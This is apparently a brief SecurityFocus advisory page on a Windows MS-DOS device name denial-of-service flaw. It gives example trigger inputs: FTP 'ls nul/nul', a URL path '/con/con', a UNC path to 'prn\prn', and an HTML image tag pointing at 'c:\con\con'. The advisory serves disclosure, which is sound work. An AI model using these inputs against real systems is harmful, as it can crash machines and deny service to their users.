Microsoft Windows MS DOS Device Name DoS Vulnerability

Examples of how to remotely exploit this issue:

FTP: ftp> ls nul/nul
WWW: http ://target/con/con
\\target\prn\prn
etc.

The same results can be achieved by visiting a website and viewing an HTML file with a local reference to device\device such as <img src="c:\con\con">.


 

Privacy Statement
Copyright 2010, SecurityFocus